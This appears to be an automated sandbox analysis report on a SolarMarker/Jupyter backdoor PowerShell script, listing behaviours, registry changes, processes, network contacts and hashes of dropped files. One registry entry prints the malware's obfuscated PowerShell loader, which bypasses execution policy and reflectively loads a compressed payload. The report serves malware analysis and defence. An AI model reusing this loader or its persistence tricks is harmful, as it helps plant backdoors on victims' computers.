Analysis Overview
SHA256
5a2366fb3d365e87f77a982d83eefb5054d50e8e73d2043979e5616c7071a458
Threat Level: Known bad
The file script.ps1 was found to be: Known bad.
Malicious Activity Summary
Jupyter Backdoor/Client payload
Jupyter, SolarMarker
Blocklisted process makes network request
Drops startup file
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2023-04-13 14:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-04-13 14:26
Reported
2023-04-13 14:37
Platform
win10-20230220-en
Max time kernel
642s
Max time network
653s
Command Line
Signatures
Jupyter Backdoor/Client payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Jupyter, SolarMarker
Blocklisted process makes network request
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\MICrosoft\WIndoWs\STARt meNU\pROgraMs\STArTUP\a666a8fda214cd9238e7fd9c62da9.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy\ = "nfivyqigfpw" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command\ = "poweRsHeLl -WIndOwsTYlE hiDdeN -Ep BYPass -cOMMand \"[sYStem.RefLeCtIoN.AsSembly]::loaD({$a0aa7c41ff34f981c548499da1e4a=NEw-oBJECT syStEm.iO.MemorYSTREAm(, $aRgS[0]);$a42eb79b0134e6981a8104636b9ca=NeW-OBjECt sYSTEM.iO.mEmorYsTrEam;$ad54b764e9845ab4de9dea2a69505=nEW-oBJecT SyStem.iO.COMPReSsiON.GZIPStREAm $a0aa7c41ff34f981c548499da1e4a, ([iO.cOmpreSsiOn.COmprESSIoNMOdE]::dEcOmpReSs);$ad54b764e9845ab4de9dea2a69505.CoPytO($a42eb79b0134e6981a8104636b9ca);$ad54b764e9845ab4de9dea2a69505.cLosE();$a0aa7c41ff34f981c548499da1e4a.ClosE();retuRn $a42eb79b0134e6981a8104636b9ca.tOaRraY();}.iNvOke([SysTeM.io.FiLe]::readalLbYTes('C:\\Users\\Admin\\AppData\\Roaming\\AdOBE\\IUAhWSYnwacetBJkHpG\\JYrgHGeXzFaift.YLMrkBnbRWCVeEFGZ')));[a0cb94b33de41cafdb3b130fc96f7.a1dc1fc073f4b6be3d290facb90f5]::a2197eb87d64aa8dada0c2f713e48()\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4452 wrote to memory of 2568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 4452 wrote to memory of 2568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 2568 wrote to memory of 3576 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| PID 2568 wrote to memory of 3576 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES618D.tmp" "c:\Users\Admin\AppData\Local\Temp\lajkrkag\CSC8B4757A9AC8448BA5D5FEBD2A61AC.TMP"
Network
| Country | Destination | Domain | Proto |
| DE | 37.221.114.23:80 | tcp | |
| JP | 40.74.98.192:443 | tcp | |
| US | 8.8.8.8:53 | 62.13.109.52.in-addr.arpa | udp |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| US | 8.8.8.8:53 | 126.24.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp | |
| DE | 37.221.114.23:80 | tcp |
Files
memory/4452-125-0x000001C947260000-0x000001C947282000-memory.dmp
memory/4452-127-0x000001C92CD00000-0x000001C92CD10000-memory.dmp
memory/4452-128-0x000001C92CD00000-0x000001C92CD10000-memory.dmp
memory/4452-132-0x000001C947390000-0x000001C947406000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gayoq4ud.szc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.cmdline
| MD5 | b82b3c610b1bd22fea2daca6e6fcbaea |
| SHA1 | 6f18be10592e3d1a4da6343ddcac726f9329ac4f |
| SHA256 | 16319d856ba93120b0e55efcfe44abadc942751e8afb5956d5ddc5a535489e5e |
| SHA512 | 7246e8d7b9f86dc034fa5ef5f28547c08a6f6394a8b18002b2c0dc04709aaf3d12bd42600f1c3a0d17efd410ee7f993f493eaac35d034ed60a8d566159ddddf9 |
\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.0.cs
| MD5 | dae076349c85f1ed8db78fd3bd75473c |
| SHA1 | 33be9fc7f764edae76f95fe28f452b740a75d809 |
| SHA256 | 9e3f4a1c1286b86413b4844e216248f1a95e8a13ee74c2c71412c2d6c571f156 |
| SHA512 | ae396e869013c2c70936858646aeac2289b17c16a4f2a6b938d6d2434a30e9785e010ff3c42b9c728cd8c002ea4c8190783665f575e15962553eb7b229b9a923 |
\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\CSC8B4757A9AC8448BA5D5FEBD2A61AC.TMP
| MD5 | 244e097abf9183ad1e323ed52c620503 |
| SHA1 | be6815fe1b4930e5ccf4ea9477b61938b36f4c67 |
| SHA256 | 5455ec4c2d6b5f5dba18ec1d2870ec3d47ad993174f0f21e19fb0a6e502f60d6 |
| SHA512 | 2e61664cd3b946c133bd6dcc7adbc000dfb51f90964e0c7b6c91ca4f8fc2e683c946a3bd62c76d3237ca5f4ddd66bce277aea4dd788c10a62155d5d72ffced07 |
C:\Users\Admin\AppData\Local\Temp\RES618D.tmp
| MD5 | 90f78bb940a4b01dda650b86097b948b |
| SHA1 | e3828a76059b8a7a5a197da0cde7acac6ec79c23 |
| SHA256 | 4c94e3efadc2a9674a3082ce77f8b5e441da143149315c15058ab37703d73ea1 |
| SHA512 | 7889708aea0ef18425f5b10328354b7199119f85dbc3eaef01ce2e7bbcf5019f6ab5fc75b853560c570ca315c46f0a65c3c89742b16846ad14a92dee07030eec |
C:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.dll
| MD5 | 73520d2b97645d9989fb0f5bb1aba355 |
| SHA1 | 84ece3730dcdc6ae9dc336f397f43d1ec61dbce6 |
| SHA256 | d39562cabdf944a784e353b60c0e9ecbccb0102ff718aae74e0ef38b2efcdefa |
| SHA512 | 478138a3b2a427d07c99aae399e79eadbeb66386f5d5dc5d8b8c2883fe8536ad3ed0583f10eed5a8254bebd863c130f19c61341f0a4a86e1387fae90949b07ba |
memory/4452-159-0x000001C9471A0000-0x000001C9471A8000-memory.dmp
memory/4452-194-0x000001C92CD00000-0x000001C92CD10000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\DKgktXvNZPFr.RGQqJyjbphVErkPTA
| MD5 | 27ae639baac5a409329887445c77646f |
| SHA1 | 8870aca8b8b0972c72f6ed23b07556ac83439558 |
| SHA256 | 555d9fab18e5be0bffcb8cb097286be783bf4c8479b71cc33e382743c686ed54 |
| SHA512 | 7434209a5e41842148d17c051c8ea17492b7949bcca5bc1334fb82f744bfbb449648f601ae805fd21efe04749d0e335c68d288add0a79566b24051096ff6e2c0 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\zNadBQkwFgH.BYydUsvQFngElaxMeNt
| MD5 | 0dd9a25dc9e735a89b895f1fe87633ff |
| SHA1 | 91bdb2d46c6d96b97032e6726e896fcffd3fa1fb |
| SHA256 | b7a430f41cabcf2d1cc9905c7db08887a8f8861f9a98cd097762272412760ec6 |
| SHA512 | 1922bb2d7a371ad0b5a1470df88eb3a0b934ed1e361d0c05900f08b04d2aeb13e6cdd585ea0a2a027067572ea90e3ca4b514b01fa927e6a2e86eaf168f083f3d |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\MlUejLxHGgWDzqpS.VAMEOGeaouZvLrFcht
| MD5 | 1139720144032052eb01c6741a039197 |
| SHA1 | 5f1425d9261ec400d90743a91f5fe9674caa5c4d |
| SHA256 | 0d3805f498980feb2c2b247990fee00b217609850bb892be1ed2af3588577434 |
| SHA512 | 928987d79463fdf02a65629089b7d8f8891b1e356e8e475799ec1554ef9f84bf0faa455f8fa460f87e9a6ef26510a324380e4515a11f974117e55750bb01f09a |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\yeIhBUKQbW.iStXzqQUYKaDCn
| MD5 | 16367ac998221144710b9ffd6d031b17 |
| SHA1 | 699746b2bf59a22205f4882b0528190b08ada96d |
| SHA256 | 14079a86451292bda035cc4cd17638b4ef4edaa4a6ced9d81b1f10a1377607de |
| SHA512 | 51452d16ff6b632d8c3982a2dba2de63c6fc386010c7a6fbbfca2c93af5e47460d717296b2c940618e5b7c15314d4b419bbadfacfbe8db55fb582e22c98c21e3 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\jbohTScZsKkXNRuzQ.UsadtGHOvVqoukKhPcW
| MD5 | e155224cda1a9854fe57af90bcb5b475 |
| SHA1 | d8030992f15f0aba20e51bce03cfd58b0be4df88 |
| SHA256 | 7ca9fcf2fbbc599995b31849698b909602e8cacd501f4bfbfa3ca7d0e504b028 |
| SHA512 | e00a6202a841bd1d6180a62ccade7340cb4ac1ecf7829bc64d60909f9c5ce8f8b2720155676a41833149efa586343811d9fb897fb3d504b33f25929a4a11db78 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\ASZQaXouDB.RkaAzwDjeUdspfto
| MD5 | acb79c1192de5be950567a971a40b5b9 |
| SHA1 | a19d8aad3dd2ef9560489972141be7d78e5d04b1 |
| SHA256 | 01b4f03cb41dc3881dd052e466b528ac7073661aeef24596f480614fa7eb8e32 |
| SHA512 | 88fa9bdcfa5ac8a81e36191e0bbb159b4bbd66a4f7bd26c28891bd76b68cfccb12f1989ff6772f792812d0c11ee82b9cc274a2a2ccebdf5bfde0747aaaaa593d |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\AFqJfBoXcuCSZtsT.YoiMWFrqHSLzjkCexb
| MD5 | 67502090d0cf262d4a14c19dfe69f524 |
| SHA1 | 9b87390eed9e8afdf246e9148022244277ef5b13 |
| SHA256 | 07fef04ad77fe166172937b8e9e38c2a9558a5c9da152f8430e122b54e7d83de |
| SHA512 | 2af2fb8620e95c04c2c6011370c6b5ee581cd91a04415a79f8f355baa59c6a682148c810a769bedd73d510c67d48921831d68fcc22c4eb8ae63ca09f7f339556 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\oUbxfLjgKmXrdcT.FfHSadwzqrZTLg
| MD5 | a30104996081729cabdca7b08655e843 |
| SHA1 | dbc4fd5547f6d8c5365d7d6cca65d44647d868ba |
| SHA256 | f3e32db459cab4f0db05919cc9f0652caf6eeaeeca25af82e843c7282f473ded |
| SHA512 | 68f7d7061acd8b367a7d44c9a20462621628c8d948d80c663ff8d16cba1edf7313001aec4591e39b5c7580b6dea675b673b4755915d2078886f1d85b65bf3257 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\LnerWMBgjOSDcPliyzT.VtcNxBAgkWa
| MD5 | e2ff7820f8b7579747a670419a3aa125 |
| SHA1 | c09f64cd5dc0513804d6bebcb1c8c006c73fcc82 |
| SHA256 | 7dabd2c07f0659c4eac0213a444e1ee2d587233858ce57edafa5ac381cb5b662 |
| SHA512 | f28882cff20694499f5a44d1bb2c80a127d57a21015dd855bcc9223630095ed8410ec63a3c8441b6f4112a848fc9868e7d8ab9b1d8a5af74fa1443bae41015a1 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\bBVJEpqwhSOFXIGYm.uHSbcxtRyWIhlps
| MD5 | a057f748414f4673fe67793265d72453 |
| SHA1 | e856da5a9a93b6e7f02e9aec8459dc1b471abca3 |
| SHA256 | 440714233f9df4549f0a6821152a74f8fb6f31519637cbfc9c2a71692f93cc80 |
| SHA512 | a27a17edee733605754fdbdee955a606d5c0544eed7e14fa6d82da83e1808ec306a67e490c4d1b140f374ecb532943048b9b7476a0ef3d7b7630014174c78121 |
C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\ftTzqRAwCP.rckJNulozCVsPaMX
| MD5 | 93035478adf3b3aafdd26edfd09b53b3 |
| SHA1 | 79c924286ddb2e1d3f808437d777b06f061bb737 |
| SHA256 | 449161c6e76077628f02136ecc85b324a8a95aa59db6514607c157b7b7e3c9b1 |
| SHA512 | 5c56c022a828933f79c827f1cebc9111976d92454ae2b6ff5672f05bf672dcd649d852e33678bae5e5f1260152439d094cc1c1e2ba6de999bcb475e5442b72b2 |
memory/4452-362-0x000001C9471E0000-0x000001C9471F2000-memory.dmp
memory/4452-367-0x000001C92CD00000-0x000001C92CD10000-memory.dmp
memory/4452-368-0x000001C92CD00000-0x000001C92CD10000-memory.dmp
memory/4452-369-0x000001C92CD00000-0x000001C92CD10000-memory.dmp